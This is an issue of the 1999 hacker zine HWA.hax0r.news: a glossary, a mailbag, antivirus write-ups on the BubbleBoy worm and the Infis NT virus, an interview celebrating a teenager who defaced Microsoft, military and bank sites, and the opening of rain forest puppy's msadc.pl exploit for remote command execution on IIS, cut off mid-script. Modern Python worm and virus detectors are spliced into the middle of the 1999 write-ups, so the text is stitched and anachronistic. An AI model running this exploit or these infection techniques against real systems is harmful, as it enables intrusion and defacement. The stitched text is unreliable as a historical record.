1. We do NOT work for the government in any shape or form. Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/

2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events it's a good idea to check out issue #1 at least and possibly also the Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...

@HWA

00.4 Whats in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Well what does HWA stand for?
never mind if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you. In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pigeonholed with those 'dumb leet (l33t?) dewds' this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers, I'd highly recommend you get that book. It's almost like buying a clue. Anyway..on with the show .. - Editorial staff

@HWA

00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Also released in issue #3. (revised) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers:

Some of the stuff related to personal usage and use in this zine are listed below: Some are very useful, others attempt to deny any possible attempts at eschewing obfuscation by obscuring their actual definitions.

@HWA - see EoA ;-)

!= - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavey equals" sign means "almost equal" to. If written as =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this ain't fucking grade school, cripes, don't believe I just typed all that..)

AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)

AOL - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one??
*CC - 1 - Credit Card (as in phraud) 2 - .cc is COCOS (Keeling) ISLANDS but they probably accept cc's

CCC - Chaos Computer Club (Germany)

*CON - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk.

*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer
           2 . An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed

Ebonics - speaking like a rastafarian or hip dude of colour also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer

EoC - End of Commentary
EoA - End of Article or more commonly @HWA
EoF - End of file
EoD - End of diatribe (AOL'ers: look it up)

FUD - Coined by Unknown and made famous by HNN - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;)

du0d - a small furry animal that scurries over keyboards causing people to type weird crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used.

*HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R

*HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or 'can you hax0r some bread on the way to the table please?'
         2 - A tool for cutting sheet metal.
HHN - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;&

HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html

J00 - "you" (as in j00 are OWN3D du0d) - see 0wn3d

MFI/MOI - Missing on/from IRC

NFC - Depends on context: No Further Comment or No Fucking Comment

NFR - Network Flight Recorder (Do a websearch) see 0wn3d

NFW - No fuckin' way

*0WN3D - You are cracked and owned by an elite entity see pheer

*OFCS - Oh for christ's sakes

PHACV - And variations of same Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare
        Alternates: H - hacking, hacktivist
                    C - Cracking
                    V - Virus
                    W - Warfare
                    A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
                    P - Phreaking, "telephone hacking" PHone fREAKs ...
                    CT - Cyber Terrorism

*PHEER - This is what you do when an ereet or elite person is in your presence see 0wn3d

*RTFM - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass.

TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0

TBA - To Be Arranged/To Be Announced also 2ba

TFS - Tough fucking shit.

*w00t - 1 - Reserved for the uber ereet, no one can say this without severe repercussions from the underground masses. also "w00ten"
        2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)

*wtf - what the fuck, where the fuck, when the fuck etc ..

*ZEN - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked.

@HWA

-=- :. .: -=-

01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Thanks to all in the community for their support and interest but I'd like to see more reader input, help me out here, what's good, what sucks etc, not that I guarantee I'll take any notice mind you, but send in your thoughts anyway.

* all the people who sent in cool emails and support

FProphet Pyra TwstdPair _NeM_ D----Y Dicentra vexxation sAs72 Spikeman p0lix Vortexia Wyze1 Pneuma Raven Zym0t1c duro Repluzer astral BHZ ScrewUp Qubik gov-boi _Jeezus_ Haze_ YTcracker

Folks from #hwa.hax0r.news and #fawkerz, #ninjachat and #sesame

Ken Williams/tattooman ex-of PacketStorm, & Kevin Mitnick

kewl sites:

+ http://www.hack.co.za NEW
+ http://blacksun.box.sk NEW
+ http://packetstorm.securify.com/ NEW
+ http://www.securityportal.com/ NEW
+ http://www.securityfocus.com/ NEW
+ http://www.hackcanada.com/
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/

@HWA

01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

"What is popular isn't always right, and what is right isn't always popular..." - FProphet '99

+++ When was the last time you backed up your important data?

Thanks to myself for providing the info from my wired news feed and others from whatever sources, also to Spikeman for sending in past entries.... - Ed

@HWA

01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Yeah we have a message board, feel free to use it, remember there are no stupid questions... well there are but if you ask something really dumb we'll just laugh at ya, lets give the message board a bit more use eh?
I'll be using a real message board when the hwa-iwa.org domain comes back online (soon) meanwhile the beseen board is still up...

==============================================================================

Our newsletter gets mirrored and indexed by new underground search engine Nethersearch.com

From: signalGod
To: hwa@press.usmc.net
Sent: Thursday, November 18, 1999 10:00 AM
Subject: NetherSearch.Com

HWA,

I am one of the webmasters of NetherSearch.Com. We subscribed to your newsletter and have decided to download all of your newsletters to our server to act as a mirror for your files. Please feel free to visit our site and check it out, and please let us know what you think. Your newsletters have been added to our database, and are searchable with our database search engine.

We would also like to invite you to submit your website to our internet search database. This will help us both by driving some traffic to your site and adding depth to our database.

Thanks,
______________________________________________________
SignalGod
NetherSearch.Com - http://www.nethersearch.com
- Underground and Hacking Database Search Engine -
Submit a URL to NetherSearch.Com - http://www.nethersearch.com/search/addurl.htm

-=-

From: Drew aka. Wyzewun
To:
Sent: Friday, November 19, 1999 1:36 PM
Subject: el8 phan mail!@#$%

*Ahem*

Dear HWA.hax0r.news,

Since I have never seen anything in your mailbag, I figured I would write to you and give you something to put there. First off, let me dispel the rumour that Cruciphux has sex with sheep. Second of all, let me dispel the rumour that there never *was* a rumour that Cruciphux has sex with sheep. And in conclusion, I would like to say that I personally enjoy having sex with sheep.

Your zine is the best in the whole wide world, except for that Forbidden Knowledge zine, which is even more kickass. Now who does that again... fux0r, I can't remember. But this is under no circumstances because I am drunk.
Or because Pneuma has mad cheap wine here. It is just because I simply DON'T KNOW, okay?!@#$

Please respond to me as soon as possible and give me a URL for good 1nph0z3 on insecurities in Vortexia's anal cavity - they told me to look for RFC31337, but I can't find it anywhere! Please help...

That Neato Elito Skanky Ass Hoe,
Wyzewun [w1@antioffline.com]

_______________________________________________________________
http://www.webmail.co.za the South-African free email service

-=-

From: Kernel Panic
To: HWA.hax0r.news
Sent: Tuesday, November 16, 1999 5:08 AM
Subject: RE: Issue #41 for Nov 7th out today

==================================================================
The following message was received at HWA.hax0r.news-owner@listbot.com and is being forwarded to you, the list owner.
==================================================================

I just want to say "Thank U for the great job of resuming the events and news of security business"

Keep up with the excellent job

Kernel Panic
South America - Peru

______________________________________________________________________
To unsubscribe, write to HWA.hax0r.news-unsubscribe@listbot.com
Start Your Own FREE Email List at http://www.listbot.com/

-=-

From:
To:
Sent: Friday, November 19, 1999 9:06 PM
Subject: xxhax0rxx claims responsibility for hacking & destroying website

Do you know this xxhax0rxx person? He has claimed responsibility for hacking & destroying a school webpage....he also posted in its place a full page of written garbage about our school. Please tell me that he is not affiliated with your group. I can send all correspondence from him to you if you would like. But he claims that he is Hax0r and goes by the screen name of xxhax0rxx.

-=-

Seems that because we have 'hax0r' in our name we're a target for all kinds of lamers that use an alias or connotation of 'hax0r', notice the 'screenname', good old AOL... - Ed

See? we really do get mail Wyze1 ;-) I just don't print it all, ok sometimes I forget, sometimes it's lame ... but kudos are always welcomed... - Ed

02.0 From the editor.
~~~~~~~~~~~~~~~~

#include <stdio.h>

int main(void)
{
    printf("Read commented source!\n\n");

    /*
     * We're a week behind schedule with this release again,
     * seems like I'm not doing well in cold season. Being ill
     * sucks and doesn't lend itself towards working on the
     * newsletter. Anyway here it is, have fun.. check out all
     * the new website defacements by sSh (Sesame Street Hackers)
     * they've been busy ppl...
     */

    printf("EoF.\n");
    return 0;
}

Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mailbombs can go to /dev/null nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org

danke.

C*:.

-= start =--= start =--= start =--= start =--= start =--= start =--= start =-

Content start

-= start =--= start =--= start =--= start =--= start =--= start =--= start =-

03.0 Bubbleboy email worm description
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.avp.ch

I-Worm.BubbleBoy

Type: Email Worm
Platform: MS Windows with Internet Explorer 5.0, MS Outlook 98/2000 or MS Outlook Express

This is a worm virus spreading via the Internet as infected email messages. The worm arrives as a message with no attachments - the worm uses several tricks to activate its code directly from the message body. When this message is opened, the worm code takes control, gets access to system resources (disk files and system registry), processes the Outlook address book and sends infected messages to these addresses (in a similar way to the "Macro.Word97.Melissa" virus).
This is the first known modern Internet worm that spreads its copies with no attached data. In the case of other Internet worms a user has to open the attachment to activate the worm routines. In the case of this worm its spreading routines take control the moment the message itself is opened.

The Tricks

To spread its copies this worm uses two tricks. The first one is the feature of MS Outlook that allows creating messages in HTML format. HTML messages may contain scripts that are automatically executed the moment the HTML message is displayed (i.e. when the user opens the message). The worm uses this feature to run its code when the infected message is opened.

To spread its copies further and to bypass Internet Explorer security the worm uses another trick, the so-called "Scriptlet.Typelib" security vulnerability. This security hole allows HTML scripts to create disk files. The worm uses it to create an HTA file (HTML Application, a file type introduced with IE5) which contains the main worm code. This file is created in the Windows Startup folder, and as a result it is activated on the next Windows startup. Being run as a local disk file, the worm script in this HTA gets access to disk files and resources with no Internet Explorer security warnings, connects to the Outlook address book and spreads itself.

Technical details

When a user opens the infected message the worm script embedded in the message body is automatically activated and executed by MS Outlook. This script (by using the security hole) creates the file "UPDATE.HTA" in the "C:\WINDOWS\START MENU\PROGRAMS\STARTUP" directory. The worm tries to create the same file in the "C:\WINDOWS\MENU INICIO\PROGRAMAS\INICIO\" directory (the default name on Spanish Windows). This "UPDATE.HTA" file contains the main worm code. It will be executed on the next Windows startup because of its location in the Startup folder.
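The three traits described above (script inline in an HTML body, a Scriptlet.TypeLib object being created, and an .HTA dropped into a Startup folder) are all visible in the raw message before anything is rendered, so a mail gateway can flag them. The checker below is an added example written for this issue, not AVP's or the worm author's code: the two sample messages are constructed to match the description (the "suspect" one contains no real worm code, only a body shaped like it), and the Spanish "INICIO" path is included alongside "STARTUP" because the write-up says both are tried.

```python
import email
import re
from email import policy

# Constructed sample messages (made up for this example). SAMPLE_SUSPECT is shaped like
# the BubbleBoy description: HTML mail, no attachment, inline VBScript, Scriptlet.TypeLib
# used to write an .HTA into the Startup folder. It is not the worm's actual code.
SAMPLE_SUSPECT = """\
From: someone@example.invalid
To: victim@example.invalid
Subject: BubbleBoy back!
MIME-Version: 1.0
Content-Type: text/html; charset="us-ascii"

<html><body>
The BubbleBoy incident, pictures and sounds
<script language="VBScript">
Set tl = CreateObject("Scriptlet.TypeLib")
tl.Path = "C:\\WINDOWS\\START MENU\\PROGRAMS\\STARTUP\\UPDATE.HTA"
</script>
</body></html>
"""

SAMPLE_CLEAN = """\
From: colleague@example.invalid
To: victim@example.invalid
Subject: Meeting
MIME-Version: 1.0
Content-Type: text/html; charset="us-ascii"

<html><body><p>Meeting moved to 3pm, see you there.</p></body></html>
"""

# Each indicator is (label, regex). The STARTUP/INICIO alternation covers the English and
# Spanish Startup folder names the write-up lists.
INDICATORS = [
    ("inline <script> in HTML body", re.compile(r"<script\b", re.I)),
    ("Scriptlet.TypeLib object creation", re.compile(r"Scriptlet\.TypeLib", re.I)),
    (".HTA written into a Startup folder",
     re.compile(r"\\(?:STARTUP|INICIO)\\[^\"'<>]*\.HTA", re.I)),
]


def scan_message(raw: str) -> list:
    """Return the list of BubbleBoy-style indicators found in an RFC 822 message."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings = []
    has_attachment = False
    for part in msg.walk():
        if part.get_content_disposition() == "attachment":
            has_attachment = True
        if part.get_content_type() != "text/html":
            continue                      # only HTML bodies can carry executable script
        body = part.get_content()
        for label, rx in INDICATORS:
            if rx.search(body):
                findings.append(label)
    # The distinguishing feature of this worm: the payload needs no attachment at all.
    if findings and not has_attachment:
        findings.append("no attachment: payload rides in the message body itself")
    return findings


if __name__ == "__main__":
    for name, sample in (("suspect", SAMPLE_SUSPECT), ("clean", SAMPLE_CLEAN)):
        print(name, "->", scan_message(sample) or "nothing found")
```

The first indicator alone (a script tag in HTML mail) is common in legitimate marketing mail of the period, so treat it as a weight rather than a verdict; the Scriptlet.TypeLib ProgID and a Startup-folder .HTA path are the ones worth quarantining on.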
The worm has a minor bug here: it assumes that Windows is always installed in the C:\WINDOWS directory; otherwise the worm cannot create its file and fails to replicate further.

When the UPDATE.HTA file is executed, the worm runs the Outlook application in a hidden window and creates a new message to all recipients from the Outlook address book in the same way as the "Melissa" virus does. This new message is in HTML format and contains the worm script in the body. The message subject is "BubbleBoy back!", and the body text looks like this:

  The BubbleBoy incident, pictures and sounds
  http://www.towns.com/dorms/tom/bblboy.htm

(Note: the above web address doesn't work)

After this message has been sent, to avoid sending duplicate messages the worm creates the registry key:

  "HKEY_LOCAL_MACHINE\Software\OUTLOOK.BubbleBoy\" = "OUTLOOK.BubbleBoy 1.0 by Zulu"

At the end the worm leaves on the screen a window with the text:

  System error, delete "UPDATE.HTA" from the startup folder to solve this problem.

The worm also changes the Windows registration data (this routine is executed at the moment the UPDATE.HTA script takes control):

  RegisteredOwner = "BubbleBoy"
  RegisteredOrganization = "Vandelay Industries"

Protection

Microsoft has released an update that eliminates this security vulnerability (Microsoft Security Bulletin MS99-032, the "Scriptlet.typelib/Eyedog" fix). We strongly recommend you visit http://support.microsoft.com/support/kb/articles/Q240/3/08.ASP and install this update.

If you do not use any HTML applications (HTA files) in your work, there is another way to prevent infection by viruses of this type (the worms and viruses that use the "Scriptlet.Typelib" security vulnerability). It requires removing the file association for the .HTA extension. Note that this only stops the dropped file from being run from the Startup folder; it does not close the hole itself, so a script can still write arbitrary files to disk until the patch is installed. To do this follow these steps:

 1. Double click the My Computer icon on the desktop.
 2. In the window that appears choose the menu "View" -> "Options...".
 3. On the "File Types" tab in the "Registered file types" listbox select the "HTML Application" item.
 4. Click the "Remove" button and confirm the action.
 5. Close the options dialog box.

@HWA

04.0 WinNT.Infis.4608 new Win NT virus
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.avp.ch/

WinNT.Infis.4608

"Infis" is a memory resident virus operating under Windows NT 4.0 with Service Pack 2, 3, 4, 5 or 6 installed. It does not affect systems running Windows 95/98, Windows 2000 or other versions of Windows NT.

Indication of an infection

The virus does not manifest itself in any way and does not do any deliberate harm to the system. Despite this the virus has a bug in its infection routine and corrupts some files while infecting them; the corrupted files, when run, cause the standard "is not a valid Windows NT application" error message. Another indicator of virus presence is the INF.SYS file in the \WinNT\System32\Drivers folder.

Installation

The virus installation routine copies the virus to the system, registers it there and returns control to the host program. As a result on first start the virus just installs its "dropper" to the system and does not infect WinNT memory or other files. The memory and file infection routines will be activated later, when the "dropper" is run.

To install its "dropper" the virus extracts its "pure" code (4608 bytes) as a standalone PE EXE file with the name INF.SYS and writes it to the \SystemRoot\system32\drivers directory. Next the virus adds "run-it" commands to the system registry; to do that the virus creates a new Registry key with three values:

  \Registry\Machine\System\CurrentControlSet\Services\inf
    Type = 1          - standard Windows NT (kernel) driver, SERVICE_KERNEL_DRIVER
    Start = 2         - driver start mode, SERVICE_AUTO_START
    ErrorControl = 1  - continue system loading on error in driver, SERVICE_ERROR_NORMAL

As a result the virus dropper is loaded as a WinNT system driver on the next system restart. When the INF.SYS virus dropper takes control the virus allocates a block of WinNT memory, reads its complete copy from the INF.SYS file for further use in the infection routine and hooks a poorly documented WinNT internal system function handler.
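Because Infis hooks file opens in the kernel, the cleanest place to look for it is offline: the Infection section that follows says it marks every file it has touched by setting the PE header's TimeDateStamp to FFFFFFFFh and appends its body to the last section, so the entry point of an infected file lands there. The scanner below is an added example for this issue (not AVP's code and not based on the virus itself): it parses the PE headers by hand, builds two constructed header-only images (a clean one and one carrying both marks) so it can be run without a real sample, and skips CMD.EXE as the write-up says the virus does. The entry-point-in-last-section test is a generic appender heuristic, not something specific to Infis.

```python
import struct

# PE format facts (not from the write-up); 0xFFFFFFFF is the marker the write-up says Infis
# stores in TimeDateStamp to recognise files it has already infected.
IMAGE_DOS_SIGNATURE = b"MZ"
IMAGE_NT_SIGNATURE = b"PE\0\0"
INFIS_TIMESTAMP_MARKER = 0xFFFFFFFF
# Machine, NumberOfSections, TimeDateStamp, PtrSymTab, NumSyms, SizeOfOptionalHeader, Characteristics
COFF_HEADER_FMT = "<HHIIIHH"
# Name, VirtualSize, VirtualAddress, SizeOfRawData, PtrRawData, PtrReloc, PtrLines, NReloc, NLines, Characteristics
SECTION_HEADER_FMT = "<8sIIIIIIHHI"


def parse_pe(data: bytes):
    """Return (timestamp, entry_rva, [(name, va, vsize, rawsize), ...]) from a PE image."""
    if data[:2] != IMAGE_DOS_SIGNATURE:
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != IMAGE_NT_SIGNATURE:
        raise ValueError("missing PE signature")
    coff_off = e_lfanew + 4
    _, nsec, timestamp, _, _, opt_size, _ = struct.unpack_from(COFF_HEADER_FMT, data, coff_off)
    opt_off = coff_off + struct.calcsize(COFF_HEADER_FMT)
    entry_rva = struct.unpack_from("<I", data, opt_off + 16)[0]   # AddressOfEntryPoint
    sec_off = opt_off + opt_size
    sections = []
    for i in range(nsec):
        name, vsize, va, rawsize, *_ = struct.unpack_from(SECTION_HEADER_FMT, data, sec_off + 40 * i)
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"), va, vsize, rawsize))
    return timestamp, entry_rva, sections


def infis_indicators(data: bytes, filename: str = "") -> list:
    """Heuristics for an Infis-style appending infector; returns the findings as strings."""
    findings = []
    if filename.lower().endswith("cmd.exe"):
        return findings        # the write-up says the virus leaves CMD.EXE alone
    timestamp, entry_rva, sections = parse_pe(data)
    if timestamp == INFIS_TIMESTAMP_MARKER:
        findings.append("TimeDateStamp == 0xFFFFFFFF (Infis 'already infected' marker)")
    if sections:
        name, va, vsize, rawsize = sections[-1]
        if va <= entry_rva < va + max(vsize, rawsize):
            findings.append(f"entry point 0x{entry_rva:X} lies inside the last section ({name})")
    return findings


def build_test_pe(timestamp, entry_rva, sections) -> bytes:
    """Constructed header-only PE32 image for testing (no code, never runnable)."""
    e_lfanew = 0x40
    dos = IMAGE_DOS_SIGNATURE + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)         # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)    # AddressOfEntryPoint
    coff = struct.pack(COFF_HEADER_FMT, 0x14C, len(sections), timestamp, 0, 0, len(opt), 0x0102)
    hdrs = b"".join(
        struct.pack(SECTION_HEADER_FMT, n.encode().ljust(8, b"\0"), vs, va, rs, 0, 0, 0, 0, 0, 0x60000020)
        for n, va, vs, rs in sections)
    return dos + IMAGE_NT_SIGNATURE + coff + bytes(opt) + hdrs


# Constructed samples: a normal layout, and one with the marker and 4608 appended bytes
# (the write-up's virus size) on the last section with the entry point moved into it.
CLEAN = build_test_pe(0x3835B2C0, 0x1000,
                      [(".text", 0x1000, 0x800, 0x800), (".data", 0x2000, 0x200, 0x200)])
INFECTED = build_test_pe(0xFFFFFFFF, 0x2200,
                         [(".text", 0x1000, 0x800, 0x800), (".data", 0x2000, 0x200 + 4608, 0x200 + 4608)])

if __name__ == "__main__":
    for label, img in (("clean", CLEAN), ("infected", INFECTED)):
        print(label, "->", infis_indicators(img) or "no indicators")
```

Pair this with the host-level checks the write-up gives: the presence of \SystemRoot\system32\drivers\INF.SYS and a Services\inf key with Type=1, Start=2. A zeroed or -1 timestamp also turns up in some legitimately built binaries, and packed executables routinely start in their last section, so both findings together are a much stronger signal than either alone.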
The hook intercepts only the file-open function, checks the file name and extension, then opens the file, checks the file format (PE) and runs the infection routine.

Infection

The "Infis" virus infects only PE (Portable Executable) EXE files, except CMD.EXE (the Windows NT command processor). To tell infected files from uninfected ones the virus sets the TimeDateStamp double word in the PE file header to -1 (FFFFFFFFh). While infecting a file the virus increases the size of the last file section, writes itself there and modifies the necessary fields in the file header. As a result, when an infected PE file is executed the virus code receives control and runs the installation routine.

Payload

The "Infis" virus does not carry any destructive payload. However, it contains errors that corrupt some files when infecting them. When a corrupted file is run it invokes a standard Windows NT application error message.

05.0 OSALL Interview with Flipz 1st person to deface a Microsoft site.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Interview With Flipz
10/27/99
Mike Hudack
Editor-in-Chief

Flipz is a young man who both goes to school and moonlights as a systems analyst somewhere. He's got a bright future for someone only fifteen years old [Editor's NOTE: As the writer of this article, I must admit that I am but sixteen years old.]... And, at that young age, he has been covered in MSNBC, Ziff Davis, Slashdot and so many more. At that young age he's made history as the first person to deface a Microsoft Web page -- ever.

"I do it for fun, just like everyone does it for fun," Flipz said in an effort to explain why he defaces sites, "we don't do it because we have to, we don't do it because we want to, we don't do it because it's fun."

He says that his first defacement was when he was around ten or eleven -- that time a Solaris machine. He knows that he hacks but doesn't know that he's defaced servers?
Andersen Air Force Base

"Hold on five seconds, I'll tell you," he told me when I asked if anything else was happening soon. After a couple affirmatives and a few obscenities he informed me that he'd just gotten his latest defacement. "Andersen.af.mil," he calmly told me. It was just the latest in a string of sites he had previously held root on.

Apparently something has happened in Flipz' life to make him want to just throw it all out. "It's been tough," he said. "I just wanted to have some fun," let out some pent-up aggression.

Microsoft

Now it seems that he targets Microsoft NT boxes exclusively, explaining that he hates Windows NT -- and that Windows 2000 pisses him off even more. The thing that Flipz is most famous for right now is defacing the first Microsoft site ever. He was on the phone with someone when he defaced it... When he heard it was the first he was excited, but not surprised. "I kind of knew it, but I didn't know it," he says about the defacement.

High Profile

Like the Microsoft defacement, all of Flipz' attacks have been attention garnering, although none so much as that. He's attacked numerous military sites, including from the Navy and Army. In addition he's defaced two Department of Energy Web sites and the Duracell Battery Company, among others.

Law Enforcement

It was a couple months ago when Flipz defaced People's Bank, a relatively small Connecticut bank. Somewhat afterwards Attrition.org was subpoenaed for any records they may have pertaining to Flipz and the defacement. When I told him about the subpoena Flipz was rather shocked that the FBI hadn't raided him yet. "It's been a while... you'd think they would have at least stopped me after White Sands [Missile Base.]" The FBI didn't though.

At one point during our conversation Flipz thought he was being raided as a black van rounded the corner to his house. It turned out to be nothing, however. "I'm just sitting on edge, waiting for them to raid me," he said.
He explained that he hadn´t done much to cover his tracks because they´d find him anyway. "Why bother with twenty hops when they´ll just issue twenty subpeonas?" And, he added, "even if I cover my tracks well... all they need is one person on IRC to say `oh, I know who this person is.´" The FBI, at this point, doesn´t seem to know Flipz´ identity. They asked me several times in a later interview, and each time came up empty because I didn´t know myself. More is available on the FBI. Skills Some people on IRC have questioned Flipz´ skills. Flipz says that he "works with NT on a daily basis [as a] systems analyst" but others aren´t too sure. "He´s demonstrated no real NT skills," said one IRCer who knew flipz but wished to remain anonymous. This IRCer said that all the defacements were on NT systems running IIS, insinuating that Flipz was simply using the eEye exploit released earlier this year. But Flipz mantains that "I´m not using IIS, I´m not using FrontPage, I´m not using FTP exploits..." Rather, he says he´s using "some exploits modified for my own use and a private one or two." More detail on his methodology, or speculation thereof, is available. Related links: http://www.aviary-mag.com/News/FBI/fbi.html http://www.aviary-mag.com/News/Old_News/IIS___eEye/iis___eeye.html http://www.aviary-mag.com/News/The_Exploit/the_exploit.html Flipz' Exploit? 
(Previously released)
~~~~~~~~~~~~~~~~~~~~~

########################################################################
#!/usr/bin/perl
#
# MSADC/RDS 'usage' (aka exploit) script version 2
#
# by rain forest puppy
#
# - added UNC support, really didn't clean up code, but oh well

use Socket; use Getopt::Std;
getopts("e:vd:h:XRVNwcu:s:", \%args);

print "-- RDS smack v2 - rain forest puppy / ADM / wiretrip --\n";
if (!defined $args{h} && !defined $args{R}) {
print qq~
Usage: msadc.pl -h { -d -X -v }
        -h = host you want to scan (ip or domain)
        -d = delay between calls, default 1 second
        -X = dump Index Server path table, if available
        -N = query VbBusObj for NetBIOS name
        -V = use VbBusObj instead of ActiveDataFactory
        -v = verbose
        -e = external dictionary file for step 5
        -u <\\\\host\\share\\file> = use UNC file
        -w = Windows 95 instead of Windows NT
        -c = v1 compatibility (three step query)
        -s = run only step

 Or a -R will resume a (v2) command session

~; exit;}

###########################################################
# config data

@drives=("c","d","e","f","g","h");

@sysdirs=("winnt","winnt35","winnt351","win","windows");

# we want 'wicca' first, because if step 2 made the DSN, it's ready to go
@dsns=("wicca", "AdvWorks", "pubs", "CertSvr", "CFApplications",
 "cfexamples", "CFForums", "CFRealm", "cfsnippets", "UAM",
 "banner", "banners", "ads", "ADCDemo", "ADCTest");

# this is sparse, because I don't know of many
@sysmdbs=( "\\catroot\\icatalog.mdb",
  "\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb",
  "\\system32\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb",
  "\\system32\\certmdb.mdb",
  "\\system32\\ias\\ias.mdb",
  "\\system32\\ias\\dnary.mdb",
  "\\system32\\certlog\\certsrv.mdb" ); #these are %systemroot%

@mdbs=( "\\cfusion\\cfapps\\cfappman\\data\\applications.mdb",
  "\\cfusion\\cfapps\\forums\\forums_.mdb",
  "\\cfusion\\cfapps\\forums\\data\\forums.mdb",
  "\\cfusion\\cfapps\\security\\realm_.mdb",
  "\\cfusion\\cfapps\\security\\data\\realm.mdb",
  "\\cfusion\\database\\cfexamples.mdb",
  "\\cfusion\\database\\cfsnippets.mdb",
  "\\inetpub\\iissamples\\sdk\\asp\\database\\authors.mdb",
  "\\progra~1\\common~1\\system\\msadc\\samples\\advworks.mdb",
  "\\cfusion\\brighttiger\\database\\cleam.mdb",
  "\\cfusion\\database\\smpolicy.mdb",
  "\\cfusion\\database\\cypress.mdb",
  "\\progra~1\\ableco~1\\ablecommerce\\databases\\acb2_main1.mdb",
  "\\website\\cgi-win\\dbsample.mdb",
  "\\perl\\prk\\bookexamples\\modsamp\\database\\contact.mdb",
  "\\perl\\prk\\bookexamples\\utilsamp\\data\\access\\prk.mdb" ); #these are just \

###########################################################

$ip=$args{h}; $clen=0; $reqlen=0; $|=1; $target="";
if (defined $args{v}) { $verbose=1; } else {$verbose=0;}
if (defined $args{d}) { $delay=$args{d};} else {$delay=1;}
if(!defined $args{R}){ $target= inet_aton($ip) || die("inet_aton problems; host doesn't exist?");}
if (!defined $args{R}){ $ret = &has_msadc; }
if (defined $args{X}) { &hork_idx; exit; }
if (defined $args{N}) { &get_name; exit; }
if (defined $args{w}){$comm="command /c";} else {$comm="cmd /c";}
if (defined $args{R}) { &load; exit; }

print "Type the command line you want to run ($comm assumed):\n" . "$comm ";
$in=<STDIN>; chomp $in;
$command="$comm " . $in ;

if (!defined $args{s} || $args{s}==1){
print "\nStep 1: Trying raw driver to btcustmr.mdb\n";
&try_btcustmr;}

if (!defined $args{s} || $args{s}==2){
print "\nStep 2: Trying to make our own DSN...";
if (&make_dsn){ print "<<success>>\n"; sleep(3); } else { print "<<failed>>\n"; }}
# we need to sleep to let the server catchup

if (!defined $args{s} || $args{s}==3){
print "\nStep 3: Trying known DSNs...";
&known_dsn;}

#crippled

if (!defined $args{s} || $args{s}==5){
if (defined $args{u}){ print "\nStep 5: Trying UNC..."; &use_unc; }
else { print "\nNo -u; Step 5 skipped.\n"; }}

if (!defined $args{s} || $args{s}==6){
